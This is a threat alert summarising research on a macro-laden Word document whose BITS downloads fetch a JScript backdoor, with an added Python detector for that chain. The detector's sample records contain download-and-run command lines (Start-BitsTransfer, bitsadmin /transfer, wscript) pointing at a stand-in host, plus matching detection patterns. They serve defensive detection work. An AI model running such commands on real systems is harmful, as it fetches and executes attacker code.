Rewterz Threat Alert – A new breed of Separ Malware Targets Hundreds of Industrial Companies
December 18, 2019
Rewterz Threat Alert – Fuel Dispenser Merchants Targeted by Cyber Criminals
December 19, 2019
Severity
Medium
Analysis Summary
Investigation into a suspicious Word document led Positive Technologies researchers to various malware hosted on extensive network infrastructure and, ultimately, to the attacker behind the malicious activity. The initial analyzed file was a Word document containing a malicious macro that leverages the BITS PowerShell cmdlet to download and run a JScript file from a remote server. Pivoting off the JScript file, various RTF, LNK, and Word samples were found using either the BITS PowerShell cmdlet or bitsadmin to download and execute the same payload. This JScript file was identified as a WSH backdoor similar to the Houdini worm. After connecting to the C2 server and sending basic system information via HTTP POST requests, the victim host receives backdoor commands such as downloading and uploading files, stealing clipboard contents, and running commands. Reviewing the C2 server leveraged by this backdoor led to the discovery of a large number of malicious files. Included were a Houdini variant, a lightweight Java backdoor, a PowerShell Chrome stealer, a PowerShell keylogger, WebBrowserPassView, the NetWire RAT, TCP Listener, xRAT, and a server-side panel/builder for the aforementioned JScript backdoor.
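The delivery chain above (Office macro, then the BITS PowerShell cmdlet or bitsadmin fetching a JScript file, then a Windows script host running it) is exactly what process-creation telemetry can surface. The following detection logic is an added example, not part of the Rewterz alert or the Positive Technologies research; the log records, file names and the example.invalid host are constructed, and the field names (parent, image, cmdline) are an assumed simplification of Sysmon Event ID 1 data.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style); not taken from the alert.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "Start-BitsTransfer -Source http://example.invalid/u.js -Destination $env:TEMP\\u.js"'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority high http://example.invalid/u.js %TEMP%\\u.js"},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\u\AppData\Local\Temp\u.js"},
    # Benign control record: PowerShell launched from the shell with no BITS usage.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
DOWNLOADERS = ("powershell.exe", "bitsadmin.exe") + OFFICE_APPS
# Either the BITS cmdlet or the legacy bitsadmin client being used to transfer a file.
BITS_PATTERN = re.compile(r"start-bitstransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
JS_PATTERN = re.compile(r"\.js\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the detection labels that apply to one process-creation event."""
    parent, image = basename(event["parent"]), basename(event["image"])
    cmd = event["cmdline"]
    findings = []
    # Stage 1: an Office application driving a BITS download (macro stage of the chain).
    if parent in OFFICE_APPS and BITS_PATTERN.search(cmd):
        findings.append("office_bits_download")
    # Stage 2: a script host executing a .js file spawned by the downloader stage.
    if image in SCRIPT_HOSTS and JS_PATTERN.search(cmd) and parent in DOWNLOADERS:
        findings.append("script_host_js_from_downloader")
    return findings


def scan(events):
    """Run classify over a batch and return (event index, label) pairs."""
    return [(i, label) for i, ev in enumerate(events) for label in classify(ev)]
```

Correlating the two labels within a short window on the same host raises confidence well above either alone, since a single BITS transfer from Office is sometimes legitimate.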
Impact
Exposure of sensitive information
Indicators of Compromise
Remediation
- Block all threat indicators at your respective controls.
- Always be suspicious about emails sent by unknown senders.
- Never click on the links/attachments sent by unknown senders.